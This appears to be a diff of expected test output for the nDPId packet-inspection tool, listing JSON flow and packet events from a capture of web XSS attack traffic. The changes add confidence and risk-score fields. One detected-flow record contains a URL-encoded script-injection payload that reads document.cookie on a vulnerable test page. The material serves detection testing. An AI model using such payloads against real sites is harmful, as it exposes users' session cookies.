 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347422332,"flow_last_seen":1499347427732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347547452,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57022,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347423604,"flow_last_seen":1499347428732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347547452,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57036,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347423604,"flow_last_seen":1499347428732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347547452,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57036,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347423604,"flow_last_seen":1499347428732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347547452,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57036,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"finished","flow_packets_processed":320,"flow_first_seen":1499347355229,"flow_last_seen":1499347423381,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232389,"flow_avg_l4_payload_len":726,"midstream":0,"ts_msec":1499347547452,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56306,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"finished","flow_packets_processed":320,"flow_first_seen":1499347355229,"flow_last_seen":1499347423381,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232389,"flow_avg_l4_payload_len":726,"midstream":0,"ts_msec":1499347547452,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56306,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4839,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347547687,"flow_last_seen":1499347547687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347547687,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58360,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4839,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_packet_id":1,"flow_last_seen":1499347547687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347547687,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89IlAAD4G0UasEAABwKgKMuP4AFDYf+rfAAAAAKACchCXygAAAgQFtAQCCAoBOx5WAAAAAAEDAwc="}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4840,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_packet_id":2,"flow_last_seen":1499347547687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347547687,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4\/gRtWE22H\/q4KAScSAyDgAAAgQFtAQCCAoD5O\/LATseVgEDAwc="}
@@ -1911,7 +1911,7 @@
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":1,"flow_last_seen":1499347551495,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347551495,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8D\/NAAD4Gtd2sEAABwKgKMuQgAFDTqC39AAAAAKACchBVpAAAAgQFtAQCCAoBOyIOAAAAAAEDAwc="}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":2,"flow_last_seen":1499347551496,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347551496,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5CCgVV5k06gt\/qAScSBgYQAAAgQFtAQCCAoD5PODATsiDgEDAwc="}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4874,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":3,"flow_last_seen":1499347551496,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347551496,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0D\/RAAD4GteSsEAABwKgKMuQgAFDTqC3+oFVeZYAQAOX\/aAAAAQEICgE7Ig4D5POD"}
-01005{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4876,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347547687,"flow_last_seen":1499347551497,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"ts_msec":1499347551497,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58360,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27MRVS1VO9FLO4CFA5FLJ13I9GULOFH69WHOJQ0PH0OKE2FMG3MQ%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
+01111{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4876,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347547687,"flow_last_seen":1499347551497,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"ts_msec":1499347551497,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58360,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27MRVS1VO9FLO4CFA5FLJ13I9GULOFH69WHOJQ0PH0OKE2FMG3MQ%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4885,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347552736,"flow_last_seen":1499347552736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347552736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4885,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":1,"flow_last_seen":1499347552736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347552736,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8B91AAD4GvfOsEAABwKgKMuQuAFCEqySZAAAAAKACchCswQAAAgQFtAQCCAoBOyNEAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4886,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":2,"flow_last_seen":1499347552736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347552736,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5C6xPoYyhKskmqAScSB9kQAAAgQFtAQCCAoD5PS5ATsjRAEDAwc="}
@@ -1924,17 +1924,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4912,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":347,"flow_packet_id":1,"flow_last_seen":1499347556523,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347556523,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89uZAAD4GzumsEAABwKgKMuRWAFDF1NARAAAAAKACchC8RAAAAgQFtAQCCAoBOyb3AAAAAAEDAwc="}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4913,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":347,"flow_packet_id":2,"flow_last_seen":1499347556523,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347556523,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5FYT\/QypxdTQEqAScSCgLAAAAgQFtAQCCAoD5PhsATsm9wEDAwc="}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4914,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":347,"flow_packet_id":3,"flow_last_seen":1499347556524,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347556524,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09udAAD4GzvCsEAABwKgKMuRWAFDF1NASE\/0MqoAQAOU\/NAAAAQEICgE7JvcD5Phs"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347426122,"flow_last_seen":1499347431733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347557536,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57062,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347426122,"flow_last_seen":1499347431733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347557536,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57062,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347426122,"flow_last_seen":1499347431733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347557536,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57062,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347427366,"flow_last_seen":1499347432733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347557536,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57076,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347427366,"flow_last_seen":1499347432733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347557536,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57076,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347427366,"flow_last_seen":1499347432733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347557536,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57076,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347428671,"flow_last_seen":1499347433734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347557536,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57090,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347428671,"flow_last_seen":1499347433734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347557536,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57090,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347428671,"flow_last_seen":1499347433734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347557536,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57090,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347431192,"flow_last_seen":1499347436733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347557536,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57116,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347431192,"flow_last_seen":1499347436733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347557536,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57116,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347431192,"flow_last_seen":1499347436733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347557536,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57116,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347432482,"flow_last_seen":1499347437734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347557536,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57130,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347432482,"flow_last_seen":1499347437734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347557536,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57130,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347432482,"flow_last_seen":1499347437734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347557536,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57130,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347433753,"flow_last_seen":1499347439734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347557536,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57144,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347433753,"flow_last_seen":1499347439734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347557536,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57144,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347433753,"flow_last_seen":1499347439734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347557536,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4927,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347557789,"flow_last_seen":1499347557789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347557789,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58468,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4927,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":348,"flow_packet_id":1,"flow_last_seen":1499347557789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347557789,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82zBAAD4G6p+sEAABwKgKMuRkAFBn0PMDAAAAAKACchD2DAAAAgQFtAQCCAoBOygzAAAAAAEDAwc="}
@@ -1964,15 +1964,15 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5002,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":354,"flow_packet_id":1,"flow_last_seen":1499347566719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347566719,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bldAAD4GV3msEAABwKgKMuTEAFDBpl67AAAAAKACchAnZgAAAgQFtAQCCAoBOzDsAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5003,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":354,"flow_packet_id":2,"flow_last_seen":1499347566719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347566719,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5MTiLAwhwaZevKAScSAzsQAAAgQFtAQCCAoD5QJhATsw7AEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5004,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":354,"flow_packet_id":3,"flow_last_seen":1499347566720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347566720,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0blhAAD4GV4CsEAABwKgKMuTEAFDBpl684iwMIoAQAOXSuAAAAQEICgE7MOwD5QJh"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347436274,"flow_last_seen":1499347441734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347567731,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57170,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
